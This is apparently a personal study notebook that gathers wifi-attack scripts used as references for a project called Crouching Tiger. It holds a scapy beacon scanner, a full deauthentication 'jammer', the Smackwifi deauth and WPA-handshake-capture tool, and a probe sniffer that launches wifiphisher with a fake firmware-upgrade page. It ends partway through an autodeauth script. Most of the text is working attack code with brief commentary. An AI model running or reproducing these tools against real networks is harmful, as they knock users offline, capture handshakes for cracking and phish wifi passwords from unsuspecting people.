Crouching Tiger Study Notebook
==============================

This notebook contains snippets of code referenced in learning notes for Crouching Tiger.



## Example #1 - The Shitty Scanner

The shitty scanner is a wifi scanner written by and distributed by the hackersarise website. It is fairly dated, and believed to have been originally written for python2.7. It's referencing title is merely for entertainment purposes, as it is not poorly written in any way or shape. Although, it earned it's name due to the fact yours truly could never get it to run as it should.

In [ ]:
#!/usr/bin/python
# -*- coding: utf-8 -*-
# fetched from https://github.com/Tanmay-Patel-21/50_Team_Forbidden/.../wifi-scanner.py

from scapy.all import *
import sys
import signal
import os
import ssl

#Function to handle Crtl+C
def signal_handler(signal, frame):
	print('\n=================')
	print('Execution aborted')
	print('=================')
	os.system("kill -9 " + str(os.getpid()))
	sys.exit(1)

def signal_exit(signal, frame):
	# print"Signal exit";
	sys.exit(1)

def usage():
	if len(sys.argv) < 3:
		print("\nUsage:")
		print("\twifi-scanner.py -i <interface>\n")
		sys.exit(1)

The below `sniffpackets` function was originally used as the packet processing function of crouching tiger. Unfortunately, it never returned any output.

In [ ]:


def sniffpackets(packet):
	try:
		SRCMAC = packet[0].addr2
		DSTMAC = packet[0].addr1
		BSSID = packet[0].addr3
	except:
		print("Cannot read MAC address")
		print(str(packet).encode("hex"))
		sys.exc_clear()

	try:
		SSIDSize = packet[0][Dot11Elt].len
		SSID = packet[0][Dot11Elt].info
	except:
		SSID = ""
		SSIDSize = 0

	if packet[0].type == 0:
		ST = packet[0][Dot11].subtype
		if str(ST) == "8" and SSID != "" and DSTMAC.lower() == "ff:ff:ff:ff:ff:ff":
			p = packet[Dot11Elt]
			cap = packet.sprintf("{Dot11Beacon:%Dot11Beacon.cap%}"
						"{Dot11ProbeResp:%Dot11ProbeResp.cap%}").split('+')
			channel = None
			crypto = set()
			while isinstance(p, Dot11Elt):
				try:
					if p.ID == 3:
						channel = ord(p.info)
					elif p.ID == 48:
						crypto.add("WPA2")
					elif p.ID == 221 and p.info.startswith('\x00P\xf2\x01\x01\x00'):
						crypto.add("WPA")
				except:
					pass
				p = p.payload
			if not crypto:
				if 'privacy' in cap:
					crypto.add("WEP")
				else:
					crypto.add("OPN")
			if SRCMAC not in ssid_list.keys():
				if '0050f204104a000110104400010210' in str(packet).encode("hex"):
					crypto.add("WPS")
				print("[+] New AP {0:5}\t{1:20}\t{2:20}\t{3:5}".format(channel, BSSID, ' / '.join(crypto), SSID))
				ssid_list[SRCMAC] = SSID

def init_process ():
	global ssid_list
	ssid_list = {}
	global s
	s = conf.L2socket(iface=newiface)

def setup_monitor (iface):
	print("Setting up sniff options...")
	os.system('ifconfig ' + iface + ' down')
	try:
		os.system('iwconfig ' + iface + ' mode monitor')
	except:
		print("Failed to setup monitor mode")
		sys.exit(1)
	os.system('ifconfig ' + iface + ' up')
	return iface

def check_root():
	if not os.geteuid() == 0:
		print("Run as root.")
		exit(1)

if __name__ == "__main__":
	signal.signal(signal.SIGINT, signal_handler)
	usage()
	check_root()
	parameters ={sys.argv[1]:sys.argv[2]}
	if "mon" not in str(parameters["-i"]):
		newiface = setup_monitor(parameters["-i"])
	else:
		newiface = str(parameters["-i"])
	init_process()
	print("Sniffing on interface " + str(newiface) + "...\n")
	sniff(iface=newiface, prn=sniffpackets, store=0)

## Diagram #1 - Anatomy of wifi diagram

It was from reading the page dedicated to the shitty scanner that gave rise to the below diagram, which was a poor man's attempt at diagraming the flow of different wifi packages.

In [ ]:
@startuml
boundary AP       as ap
control  Station  as stat
entity   Client   as cli
queue    Network  as net
stat -> cli: Association request
cli --> stat: Association response
stat -> cli: Reassociation request
cli --> stat: Reassociation response
stat ->o net: Probe requst
cli o-->o net: Probe response
ap ->o net: Beacon
cli --> stat: Disassociation
cli -> ap: Authentication
cli --> ap: Deauthentication
stat -> ap: Action
stat ->o net: Power-save poll
cli -> stat: Request To Send
stat --> cli: Clear To Send
cli <-> stat: ACK: Acknowledge
stat <-> cli: Data frame
stat <--> cli: Null frame
net <-> ap: QOS data
ap <--> net: QOS null
@enduml

## Example #2 - pyrdump

Pyrdump does not necessarily fall into the same group as the other scrips, as it uses the pyrcrack library and not scapy. The pyrcrack library is not nearly as robust as scapy, and includes the additional bloat of the aircrack-ng bundle. Furthermore, the example used the rich prompt library, which was an additional weight undesired. So, the use of pyrcrack was frowned upon.

In [ ]:
#!/usr/bin/env python3
#--- coding: utf-8 ---
# From: https://davidfrancos.net/pyrcrack/examples/ 

import asyncio

import pyrcrack

from rich.console import Console
from rich.prompt import Prompt

async def scan_for_targets():
    """Scan for targets, return json."""
    console = Console()
    console.clear()
    console.show_cursor(False)
    airmon = pyrcrack.AirmonNg()

    interface = Prompt.ask(
        'Select an interface',
        choices=[a['interface'] for a in await airmon.interfaces])

    async with airmon(interface) as mon:
        async with pyrcrack.AirodumpNg() as pdump:
            async for result in pdump(mon.monitor_interface):
            console.clear()
            console.print(result.table)
            await asyncio.sleep(2)


asyncio.run(scan_for_targets())

## Example #3 - Wifi Jammer

Research for crouching tiger was not just focused on performing scans and deauthentication attacks, but it was the use of scapy to manipulate wifi packets to perform common wifi attacks. For some reason or another, this example was chosen at the time as an example of using scapy to jam wifi communications.

In [ ]:
#!/usr/bin/python
#Author: @hash3liZer

import sys
import argparse
import threading
import os
import time
import signal
import random
import subprocess
import re
from pull import PULL
from scapy.sendrecv import sniff
from scapy.sendrecv import sendp
from scapy.sendrecv import send
from scapy.layers.dot11 import Dot11Beacon
from scapy.layers.dot11 import Dot11
from scapy.layers.dot11 import Dot11Elt
from scapy.layers.dot11 import RadioTap
from scapy.layers.dot11 import Dot11Deauth
from scapy.layers.dot11 import Dot11FCS
from scapy.layers.eap   import EAPOL

class JAMMER:

	__ACCESSPOINTS = []
	__EXECUTED     = []
	__DECPACKETS   = []

	__BROADCAST    = "ff:ff:ff:ff:ff:ff"

	def __init__(self, prs):
		self.aggressive = prs.aggressive
		self.verbose    = prs.verbose
		self.exceptions = prs.exceptions

		self.interface  = prs.interface

		self.channel    = prs.channel
		self.essids     = prs.essids
		self.aps        = prs.aps
		self.stations   = prs.stations
		self.filters    = prs.filters

		self.packets    = prs.packets
		self.delay      = prs.delay
		self.reset      = prs.reset
		self.code       = prs.code

	def extract_essid(self, layers):
		retval = ''
		counter = 0

		try:
			while True:
				layer = layers[counter]
				if hasattr(layer, "ID") and layer.ID == 0:
					retval = layer.info.decode('utf-8')
					break
				else:
					counter += 1
		except IndexError:
			pass

		return retval
		
	def extract_channel(self, layers):
		retval = ''
		counter = 0

		try:
			while True:
				layer = layers[counter]
				if hasattr(layer, "ID") and layer.ID == 3 and layer.len == 1:
					retval = ord(layer.info)
					break
				else:
					counter += 1
		except IndexError:
			pass

		return retval

	def get_ess(self, bss):
		retval = ''

		for ap in self.__ACCESSPOINTS:
			if ap.get('bssid') == bss:
				retval = ap.get('essid')
				break

		return retval

	def get_channel(self, bss):
		retval = 0

		for ap in self.__ACCESSPOINTS:
			if ap.get('bssid') == bss:
				retval = ap.get('channel')

		return retval

	def filter_devices(self, sn, rc):
		retval = {
			'ap': '',
			'sta': '',
		}

		for ap in self.__ACCESSPOINTS:
			if ap.get('bssid') == sn:
				retval['ap'] = sn
				retval['sta'] = rc
			elif ap.get('bssid') == rc:
				retval['ap'] = rc
				retval['sta'] = sn

		return retval	

	def aggressive_run(self, ap, sta):
		pkt = self.forge(ap, sta)[0]

		self.write(ap, sta)

		while True:
			sendp(
				pkt,
				iface=self.interface,
				count=1,
				inter=0,
				verbose=False
			)	

	def aggressive_handler(self, ap, sta):		
		if (sta not in self.exceptions) and (self.aggressive) and (len(self.channel) == 1):
			t = threading.Thread(target=self.aggressive_run, args=(ap, sta))
			t.daemon = True
			t.start()


	def clarify(self, toappend):
		essid = toappend.get('essid')
		bssid = toappend.get('bssid')

		if self.essids:
			if essid in self.essids:
				if self.aps:
					if bssid in self.aps:
						self.__ACCESSPOINTS.append( toappend )
						self.aggressive_handler(bssid, self.__BROADCAST)
				else:
					self.__ACCESSPOINTS.append( toappend )
					self.aggressive_handler(bssid, self.__BROADCAST)
		else:
			if self.aps:
				if bssid in self.aps:
					self.__ACCESSPOINTS.append( toappend )
					self.aggressive_handler(bssid, self.__BROADCAST)
			else:
				self.__ACCESSPOINTS.append( toappend )
				self.aggressive_handler(bssid, self.__BROADCAST)

	def invalid(self, sta):
		for exception in self.exceptions:
			if sta.startswith(exception):
				return True

		return False

	def is_valid_sta(self, sta):
		if self.stations:
			if sta in self.stations:
				return True
			else:
				return False
		else:
			return True

	def get_crate(self, ch):
		retval = []

		for connection in self.__DECPACKETS:
			channel = connection.get('channel')

			if channel == ch:
				retval.append(connection)

		return retval

	def forge(self, ap, sta):
		def fpkt(sn, rc):
			pkt = RadioTap() / Dot11(
				type=0, 
				subtype=12,
				addr1=rc, 
				addr2=sn, 
				addr3=sn
				) / Dot11Deauth(
				reason=self.code
				)
			return pkt

		retval = []

		if sta != self.__BROADCAST:
			retval.append(fpkt(ap, sta))
			retval.append(fpkt(sta, ap))
		else:
			retval.append(fpkt(ap, sta))

		return retval

	def filtertify(self, ap, sta):
		if self.invalid(sta):
			return
		else:
			if ap not in self.filters and sta not in self.filters:
				if self.is_valid_sta(sta):
					onrun_form = (ap, sta)
					if onrun_form not in self.__EXECUTED:

						self.__EXECUTED.append(onrun_form)
						pkt_form = {
							'ap': ap,
							'sta': sta,
							'channel': self.get_channel(ap),
						}

						self.__DECPACKETS.append(pkt_form)

	def injector(self, pkt):
		if pkt.haslayer(Dot11Beacon):
			try:
				bssid = pkt.getlayer(Dot11FCS).addr2
			except:
				bssid = pkt.getlayer(Dot11).addr2

			essid = self.extract_essid(pkt.getlayer(Dot11Elt))
			channel = self.extract_channel(pkt.getlayer(Dot11Elt))

			toappend = {
				'essid': essid,
				'bssid': bssid,
				'channel': channel
			}

			if toappend not in self.__ACCESSPOINTS:
				self.clarify(
					toappend
				)

		else:
			sender = receiver = ""
			if pkt.haslayer(Dot11FCS) and pkt.getlayer(Dot11FCS).type == 2 and not pkt.haslayer(EAPOL):
				sender   = pkt.getlayer(Dot11FCS).addr2
				receiver = pkt.getlayer(Dot11FCS).addr1

			elif pkt.haslayer(Dot11) and pkt.getlayer(Dot11).type == 2 and not pkt.haslayer(EAPOL):
				sender   = pkt.getlayer(Dot11).addr2
				receiver = pkt.getlayer(Dot11).addr1

			if sender and receiver:
				result  = self.filter_devices(sender, receiver)

				if result.get('ap') and result.get('sta'):
					self.filtertify(result.get('ap'), result.get('sta'))

	def write(self, ap, sta):
		if self.verbose:
			pull.print("*",
				"Sent Deauths Count [{count}] Code [{code}] ({sdeveloper}) {sender} <--> ({rdeveloper}) {receiver} ({essid}) [{channel}]".format(
					count=pull.RED+str(self.packets)+pull.END,
					code =pull.GREEN+str(self.code)+pull.END,
					sender=pull.DARKCYAN+ap.upper()+pull.END,
					receiver=pull.DARKCYAN+sta.upper()+pull.END,
					sdeveloper=pull.PURPLE+pull.get_mac(ap)+pull.END,
					rdeveloper=pull.PURPLE+pull.get_mac(sta)+pull.END,
					essid=pull.YELLOW+self.get_ess(ap)+pull.END,
					channel=pull.RED+str(self.get_channel(ap))+pull.END
				),
				pull.YELLOW
			)
		else:
			pull.print("*",
				"Sent Deauths Count [{count}] Code [{code}] {sender} <--> {receiver} ({essid}) [{channel}]".format(
					count=pull.RED+str(self.packets)+pull.END,
					code =pull.GREEN+str(self.code)+pull.END,
					sender=pull.DARKCYAN+ap.upper()+pull.END,
					receiver=pull.DARKCYAN+sta.upper()+pull.END,
					essid=pull.YELLOW+self.get_ess(ap)+pull.END,
					channel=pull.RED+str(self.get_channel(ap))+pull.END
				),
				pull.YELLOW
			)

	def jammer(self):
		while True:
			ch = random.choice(self.channel)
			subprocess.call(['iwconfig', self.interface, 'channel', str(ch)])
			time.sleep(0.5)

			crate = self.get_crate(ch)

			for connection in crate:
				ap = connection.get( 'ap' )
				sta = connection.get( 'sta' )
				channel = connection.get( 'channel' )

				pkts = self.forge(ap, sta)
				for pkt in pkts:
					sendp(pkt, iface=self.interface, count=self.packets, inter=self.delay, verbose=False)

				self.write(ap, sta)

			self.resetter()

			time.sleep(0.5)

	def resetter(self):
		if self.reset:
			if len(self.__EXECUTED) >= self.reset:
				self.__EXECUTED = []
				self.__DECPACKETS = []

	def engage(self):
		t = threading.Thread(target=self.jammer)
		t.daemon = True
		t.start()

		sniff(iface=self.interface, prn=self.injector)

class PARSER:

	def __init__(self, opts):
		self.help        = self.help(opts.help)
		self.world       = opts.world
		self.aggressive  = opts.aggressive
		self.exceptions  = self.exceptions(opts.nbroadcast)
		self.verbose     = opts.verbose
		self.interface   = self.interface(opts.interface)

		self.channel     = self.channel(opts.channel)
		self.essids      = self.form_essids(opts.aps)
		self.aps         = self.form_macs(opts.aps)
		self.stations    = self.form_macs(opts.stations)
		self.filters     = self.form_macs(opts.filters)

		self.packets     = opts.packets if opts.packets > 0 else pull.halt("Number of packets Must Be >= 1", True, pull.RED)
		self.delay       = opts.delay   if opts.delay   >= 0 else pull.halt("Delay Interval Must be >= 0", True, pull.RED)
		self.reset       = opts.reset   if ((opts.reset == 0) or (opts.reset >= 5)) else pull.halt("Reset Must Be >= 5. ")
		self.code        = opts.code    if ((opts.code >= 1) and (opts.code <= 66)) else pull.halt("Code Must Be Greater Greater >= 1 and <= 66")

	def help(self, _help):
		if _help:
			pull.help()

	def exceptions(self, nbroadcast):
		retval = []
		if not nbroadcast:
			retval = ['00:00:00:00:00:00', '33:33:00:', '33:33:ff:', '01:80:c2:00:00:00', '01:00:5e:']
		else:
			retval = ['ff:ff:ff:ff:ff:ff', '00:00:00:00:00:00', '33:33:00:', '33:33:ff:', '01:80:c2:00:00:00', '01:00:5e:']
		return retval

	def form_essids(self, essids):
		retval = []
		if essids:
			toloop = essids.split(",")
			for essid in toloop:
				if not re.search(r"^([0-9A-Fa-f]{2}[:-]){5}([0-9A-Fa-f]{2})$", essid):
					retval.append(essid)

		return retval

	def form_macs(self, bssids):
		retval = []
		if bssids:
			toloop = bssids.split(",")
			for bssid in toloop:
				if re.search(r"^([0-9A-Fa-f]{2}[:-]){5}([0-9A-Fa-f]{2})$", bssid):
					retval.append(bssid.lower())

		return retval

	def channel(self, ch):
		retval = list(range(1,15)) if self.world else list(range(1,12))
		if ch:
			if ch in retval:
				return [ch]
			else:
				pull.halt("Invalid Channel Given.", True, pull.RED)
		else:
			return retval

	def interface(self, iface):
		def getNICnames():
			ifaces = []
			dev = open('/proc/net/dev', 'r')
			data = dev.read()
			for n in re.findall('[a-zA-Z0-9]+:', data):
				ifaces.append(n.rstrip(":"))
			return ifaces

		def confirmMon(iface):
			co = subprocess.Popen(['iwconfig', iface], stdout=subprocess.PIPE)
			data = co.communicate()[0].decode()
			card = re.findall('Mode:[A-Za-z]+', data)[0]	
			if "Monitor" in card:
				return True
			else:
				return False

		if iface:
			ifaces = getNICnames()
			if iface in ifaces:
				if confirmMon(iface):
					return iface
				else:
					pull.halt("Interface Not In Monitor Mode [%s]" % (pull.RED + iface + pull.END), True, pull.RED)
			else:
				pull.halt("Interface Not Found. [%s]" % (pull.RED + iface + pull.END), True, pull.RED)
		else:
			pull.halt("Interface Not Provided. Specify an Interface!", True, pull.RED)

def main():
	parser = argparse.ArgumentParser(add_help=False)

	parser.add_argument('-h', '--help'        , dest="help"     , default=False, action="store_true")
	parser.add_argument('-i', '--interface'   , dest="interface", default="", type=str)

	parser.add_argument('-c', '--channel'     , dest="channel"  , default=0 , type=int)
	parser.add_argument('-a', '--accesspoints', dest="aps"   , default="", type=str)
	parser.add_argument('-s', '--stations'    , dest="stations", default="", type=str)
	parser.add_argument('-f', '--filters'     , dest="filters" , default="", type=str)

	parser.add_argument('-p', '--packets'     , dest="packets" , default=5 , type=int)
	parser.add_argument('-d', '--delay'       , dest="delay"   , default=0.1, type=int)
	parser.add_argument('-r', '--reset'       , dest="reset"   , default=0  , type=int)
	parser.add_argument('--code'              , dest="code"    , default=7  , type=int)

	parser.add_argument('--world'             , dest="world"     , default=False, action="store_true")
	parser.add_argument('--aggressive'        , dest="aggressive", default=False, action="store_true")
	parser.add_argument('--no-broadcast'      , dest="nbroadcast", default=False, action="store_true")
	parser.add_argument('--verbose'           , dest="verbose"   , default=False, action="store_true")

	options = parser.parse_args()
	parser = PARSER(options)

	pull.print(
		"*",
		"IFACE [{interface}] CHANNEL [{channel}] VERBOSE [{verbose}]".format(
			interface=pull.DARKCYAN+parser.interface+pull.END,
			channel=pull.DARKCYAN+str(("HOP" if len(parser.channel) > 1 else parser.channel[0]))+pull.END,
			verbose=pull.DARKCYAN+("True" if parser.verbose else "False")+pull.END
		),
		pull.DARKCYAN,
	)

	pull.print(
		"*",
		"APS [{aps}] STATIONS [{stations}] FILTERS [{filters}]".format(
			aps=pull.DARKCYAN+str(len(parser.aps))+pull.END,
			stations=pull.DARKCYAN+str(len(parser.stations))+pull.END,
			filters=pull.DARKCYAN+str(len(parser.filters))+pull.END
		),
		pull.DARKCYAN
	)

	pull.print(
		"*",
		"PACKETS [{packets}] DELAY [{delay}] RST [{reset}] CD [{code}]".format(
			packets=pull.DARKCYAN+str(parser.packets)+pull.END,
			delay=pull.DARKCYAN+str(parser.delay)+pull.END,
			reset=pull.DARKCYAN+str(parser.reset)+pull.END,
			code=pull.DARKCYAN+str(parser.code)+pull.END
		),
		pull.DARKCYAN
	)

	pull.print(
		"^",
		"Engaing With Jammer Now",
		pull.GREEN
	)

	jammer = JAMMER(parser)
	jammer.engage()

if __name__ == "__main__":
	pull = PULL()
	main()

## Example #4 - Smackwifi

From https://github.com/n0nexist/Smackwifi

One of the numerous examples of using scapy to deauthenticate network clients.

Except for the use of decorators, this script was found to be rather easy to read and straightforward. As such, it was used as the primary example to base the attack vector of crouching tiger on.

In [ ]:
#!/usr/bin/python3
# smackwifi by github.com/n0nexist
from rich import print
from rich.console import Console
from rich.table import Table
from rich.prompt import Prompt
from rich import box
import os
import psutil
from scapy.all import *
import time
from threading import Thread

if os.getuid() != 0:
    print("You are [red]not[/red] root.")
    exit(1)

os.system("clear")
print("Welcome to [green][bold]smackwifi[/bold][/green]!")

addrs = list(psutil.net_if_addrs())
interface = Prompt.ask("Select an [bold][cyan]interface[/cyan][/bold]",choices=addrs,default=addrs[-1])

print(f"[bright_black]Sniffing in [underline]{interface}[/underline] until CTRL-C[/bright_black]...")

ap_list = []
ap_info_list = []

def handlePackets(pkt):
    global ap_list
    global ap_info_list
    if pkt.haslayer(Dot11Beacon):
        if pkt.addr2 not in ap_list: 
            ap_list.append(pkt.addr2)
            wifi_name = pkt.info.decode()
            wifi_mac = pkt.addr2
            sec_info = pkt[Dot11Beacon].getlayer(Dot11Beacon).cap
            try:
                netstats = pkt[Dot11Beacon].network_stats()
                channel  = netstats['channel']
                enctype  = str('/'.join(netstats['crypto'])).replace("OPN","[bold][red]OPEN[/red][/bold]").replace("WEP","[bold][yellow]WEP[/yellow][/bold]")
            except:
                channel = "unknown"
                enctype = "unknown"
            rssi = pkt.dBm_AntSignal if hasattr(pkt, 'dBm_AntSignal') else "unknown"
            ap_info_list.append([wifi_name,wifi_mac,enctype,str(rssi),str(channel)])
            print(f"[bright_black]+[/bright_black] Found [green]{wifi_name}[/green] ([cyan]{wifi_mac}[/cyan])")

chthread = True
stopped = False

def channel_thread(interf):
    global chthread
    global stopped
    while chthread:
        for x in range(1,14):
            os.popen(f"iwconfig {interf} channel {x}").read()
            time.sleep(0.3)
    print(f"\n[bright_black]Stopped hopping channels on [underline]{interf}[/underline][/bright_black]")
    stopped = True

total_packets = 0

def deauthenticate_wifi_network(target_mac,channel,interf,attackmode):
    global total_packets

    os.popen(f"iwconfig {interf} channel {channel}").read()
    pkt = RadioTap() / Dot11(type=0, subtype=12, addr1="ff:ff:ff:ff:ff:ff", addr2=target_mac, addr3=target_mac) / Dot11Deauth()
    if attackmode:
        while True:
            sendp(pkt, iface=interf, verbose=0)
            print(f"[bright_black]Sent [underline]{total_packets}[/underline] packets to {target_mac}[/bright_black]",end="\r")
            total_packets += 1
    else:
        for x in range(100):
            sendp(pkt, iface=interf, verbose=0)

handshake_fragments = 0

def sniffuntil(pkt):
    global handshake_fragments

    pktdmp = PcapWriter("handshake.pcap",append=True,sync=True)
    pktdmp.write(pkt)

    if EAPOL in pkt:
        handshake_fragments += 1
        print(f"[bright_black]+[/bright_black] Captured [green][underline]{handshake_fragments}[/underline][/green] EAPOL packets")

    if handshake_fragments >= 10:
        return True


def intercept_handshakes(interf):
    sniff(stop_filter=sniffuntil, iface=interf, monitor=True)


Thread(target=channel_thread,args=(interface,)).start()
    
sniff(iface=interface, prn=handlePackets)

print("\n[bright_black]Showing results[/bright_black]...")

table = Table(box=box.SIMPLE_HEAD)

table.add_column("N.", justify="left", style="bright_black")
table.add_column("SSID", justify="center", style="cyan")
table.add_column("BSSID", justify="center", style="green")
table.add_column("ENC", justify="center", style="white")
table.add_column("RSSI", justify="center", style="magenta")
table.add_column("CHANNEL", justify="center", style="blue")

c = 0
for x in ap_info_list:
    c+=1
    table.add_row(f"[bold]{c}[/bold]", x[0], x[1], x[2], x[3], x[4])

console = Console()
console.print(table)

chthread = False
while True:
    if stopped:
        break

indx = int(Prompt.ask("Insert [bold][bright_black]N.[/bold][/bright_black]",default="1"))-1
target = ap_list[indx]
chan = ap_info_list[indx][-1]
print(f"\n[bright_black]Attacking {target} on channel {chan}[/bright_black]...")

mode = Prompt.ask("Select attack mode",choices=["handshake_steal","deauth_attack"],default="deauth_attack")

print("")
Thread(target=deauthenticate_wifi_network,args=(target,chan,interface,mode == "deauth_attack",)).start()

if mode == "handshake_steal":
    print(f"[bright_black]Intercepting handshakes[/bright_black]...")
    intercept_handshakes(interface)

## Example #5 - Custom Wifi Listener

From: https://github.com/EnriqueITE/customWifiListening

Originally intended as a pre-emptive wifi scanner for attack vector facilitating wififisher. The code was unique and straightforward enough for inclusion in this notebook.

In [ ]:
#!/usr/bin/env python
# -*- coding: utf-8 -*-?
import os, time, socket, fcntl, struct
from subprocess import call
from platform import system
import threading, os, time
from threading import Thread, Lock
from subprocess import Popen, PIPE
from signal import SIGINT, signal
from scapy.all import *
import os, ConfigParser
from subprocess import Popen, PIPE

# Author: Enrique Serrano ( @EnriqueITE | hello@enriqueite.com )
# define variables
intfparent='wlan1'
intfmon='mon0'
channel=''   ### Define channel if not want to hop, and will stay in one channel
first_pass=1
lock = Lock()
DN = open(os.devnull, 'w')
verbose=0
probes = list() ## list to add station probes
os.system("clear")
enum = 0


print """ 
????   ???????   ???????   ??????????  ???????     ???  ??? ??????  ??????????  ?????????????????? 
????? ????????   ????????  ????????????????????    ???  ?????????????????????? ????????????????????
??????????????   ????????? ??????  ??????   ???    ???????????????????     ??????? ??????  ????????
??????????????   ????????????????  ??????   ???    ???????????????????     ??????? ??????  ????????
??? ??? ??????????????? ???????????????????????    ???  ??????  ??????????????  ??????????????  ???
???     ??? ??????? ???  ????????????  ???????     ???  ??????  ??? ??????????  ??????????????  ???
"""
print "      Devices          -                WiFi Networks"
print "-------------------	            ------------------------"


def OScheck():
    osversion = system()
#     print "Operating System: %s" %osversion
    if osversion != 'Linux':
        print "This script only works on Linux OS! Exitting!"
        exit(1)

def InitMon():
	if not os.path.isdir("/sys/class/net/" + intfmon):
		if not os.path.isdir("/sys/class/net/" + intfparent):
			print "WiFi interface %s does not exist! Cannot continue!" %(intfparent)
			exit(1)
		else:
			try:
				# create monitor interface using iw
				os.system("iw dev %s interface add %s type monitor" % (intfparent, intfmon))
				time.sleep(0.5)
				os.system("ifconfig %s up" %intfmon)
 				#print "Creating monitor VAP %s for parent %s..." %(intfmon,intfparent)
			except OSError as e:
				print "Could not create monitor %s" %intfmon
				os.kill(os.getpid(),SIGINT)
				sys.exit(1)
 	else:
 		if verbose: print "Monitor %s exists! Nothing to do, just continuing..." %(intfmon)

def GetMAC(iface):
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', iface[:15]))
    macaddr = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
    return macaddr

def PacketHandler(pkt) :
	global enum
	if pkt.haslayer(Dot11):
		if pkt.type == 0 and pkt.subtype == 4:   ## probe request
			if pkt.info != '':   ## broadcast probe request
				if not pkt.info in probes:
					probes.append(pkt.info)
					print "XX:XX:XX%s 		%s.)    %s" %(pkt.addr2.upper()[8:], enum, pkt.info)
					enum += 1	
def calc_freq(channel):
    if channel == 14:
        freq = 2484
    else:
        freq = 2407 + (channel * 5)
    return str(freq)

def channel_hop(channel=None):
	global intfmon, first_pass
	channelNum=0
	err = None
	while 1:
		if channel:
			with lock: monchannel = channel
		else:
			channelNum +=1
			if channelNum > 14: channelNum = 1
			with lock: first_pass = 0
			with lock: monchannel = str(channelNum)
		try:
			proc = Popen(['iw', 'dev', intfmon, 'set', 'channel', monchannel], stdout=DN, stderr=PIPE)
			if verbose: print "Setting %s interface to channel: %s (%s MHz)" %(intfmon, monchannel, calc_freq(int(monchannel)))
		except OSError:
			print 'Could not execute iw!'
			os.kill(os.getpid(),SIGINT)
			sys.exit(1)
		for line in proc.communicate()[1].split('\n'):
			if len(line) > 2: # iw dev shouldnt display output unless there's an error
				err = 'Channel hopping failed: '+ line
			if channel:
				time.sleep(.05)
			else:
				if first_pass == 1:
					time.sleep(1.5)
		continue

# Check if OS is linux:
OScheck()

# Check for root privileges
if os.geteuid() != 0:
	exit("You need to be root to run this script!")
# else:
# 	print "You are running this script as root!"

# Check if monitor device exists
InitMon()

# Get intfmon actual MAC address
#macaddr=GetMAC(intfmon).upper()
#print "Actual %s MAC Address: %s" %(intfmon, macaddr)

# Start channel hopping
hop = Thread(target=channel_hop, args=channel)
hop.daemon = True
hop.start()

# Start sniffing with timeout
sniff(iface=intfmon, prn = PacketHandler, timeout=20)
if probes:
	aux = 1
	print "\nSelect a network to continue: \n"
	for i,j in enumerate(probes):
		print str(i) + ".) " + j
	while aux:
		network = raw_input("\n-> ")
		if len(probes) > int(network):
			aux = 0
			ssid = probes[int(network)]
			print "\nOk! Creating Rogue Ap...\n"
			wifiphisherCmd = 'wifiphisher -nJ -e "%s" -T firmware-upgrade' %(ssid)
			os.system(wifiphisherCmd)
		else:
			print "\nWifi network doesn't exists, please select one included in the list."
else:
	print "Wifi probes not found, please try later..."

## Example #6 - autodeauth

From: https://github.com/Drew-Alleman/autodeauth

As is par for course, this snippet is the bulk of the autodeauth script. It was written with the intention of being used with a raspberry pi, and uses scapy to perform deauth attacks. Drew's style of coding is something I have nevery seen before in python scripts, and is on a level of it's own. His style is very expressionative and descriptive. While the heavily detailed and finely structured object oriented method of programming is very robust and explanitive, it is difficult to read.

In [ ]:
#!/usr/bin/python3

from multiprocessing import connection
import os

if os.geteuid() != 0:
    exit(
        "You need to have root privileges to run this script.\nPlease try again, this time using 'sudo'. Exiting."
    )

import time, json, logging, sys
import argparse, subprocess, threading

import wifi  # Used to scan for local networks

try:
    import RPi.GPIO as GPIO  # Used for GPI pin control
except (ImportError, RuntimeError):
    pass

from scapy.layers.dot11 import RadioTap, Dot11, Dot11Deauth
from scapy.sendrecv import sendp

LOG_DIR = "/var/log/autodeauth/"


"""Formats a string

Keyword arguments:
string -- String to format

Return
Formatted string or None if it could not be parsed
"""
format_string = (
    lambda string: None if r"\x00" in string or len(string) == 0 else string.strip()
)
"""
Creates a directory to store the json file

Keyword arguments:
ssid -- ssid to create loot directory for

Return
the filepath for the network
"""
get_loot_file = lambda ssid: f"{LOG_DIR}/loot/{ssid.replace(' ', '')}.json"

LOG_DIR = "/var/log/autodeauth/"


def save_dict_to_json_file(file_path: str, content: dict) -> bool:
    """Saves a python dictionary to a json file

    Keyword arguments:
    file_path -- File path to save the dictionary
    content   -- Dictionary to save

    Return
    False if the file was not saved or parsed
    """
    try:
        with open(file_path, "a+") as json_file:
            json.dump(content, json_file, indent=4)
        return True
    except (TypeError, EnvironmentError):
        return False


class InterfaceManager:
    def __eq__(self, intertfaceObject) -> bool:
        try:
            return self.interface == intertfaceObject.interface
        except AttributeError:
            return False

    def __bool__(self) -> bool:
        return (
            # /sys/class/net/{self.interface}/operstate <-- is linux only
            os.path.exists(f"/sys/class/net/{self.interface}/operstate")
            and self.enabled
        )

    def __init__(self, interface: str) -> None:
        self.interface = interface
        self.enabled = True
        self.mode = None
        self.create_logger()

    def create_logger(self) -> None:
        """
        Creates a logging object
        """
        self.logger = logging.getLogger("interfaceManager")
        self.logger.setLevel(logging.DEBUG)
        formatter = logging.Formatter("%(asctime)s - %(message)s", "%Y-%m-%d %H:%M:%S")
        stream_handler = logging.StreamHandler(sys.stdout)
        stream_handler.setFormatter(formatter)
        file_handler = logging.FileHandler(f"{LOG_DIR}/log")
        file_handler.setFormatter(formatter)
        self.logger.addHandler(stream_handler)
        self.logger.addHandler(file_handler)

    def get_local_networks(self) -> list:
        try:
            if self.mode == "monitor":
                self.set_mode_managed()
            networks = list(set(wifi.Cell.all(self.interface)))
            if not networks:
                return networks

            return [
                network
                for network in networks
                if format_string(network.ssid) is not None
            ]

        except wifi.exceptions.InterfaceError:
            self.logger.error(
                f"Restarting interface: {self.interface} an issue occurred"
            )
            self.restart_network_adapter()

    def did_os_command_succeed(self, command: str) -> bool:
        """Runs a command and returns true if it worked

        Keyword arguments:
        command -- command to run

        Return
        False if the command did not succeded
        """
        process: tuple = subprocess.getstatusoutput(command)
        # first item is respsonse code
        if process[0] == 0:
            return True
        return False


    def deauth_network(
        self,
        bssid_address: str,
        target_mac_address: str = "ff:ff:ff:ff:ff:ff",
        packet_count: int = 5000,
        frequency: int = 0,
        verbose: int = 0,
    ) -> bool:
        """
        Saves the network object to a json file

        Keyword arguments:
        bssid_address      --  MAC address of the router to deauth
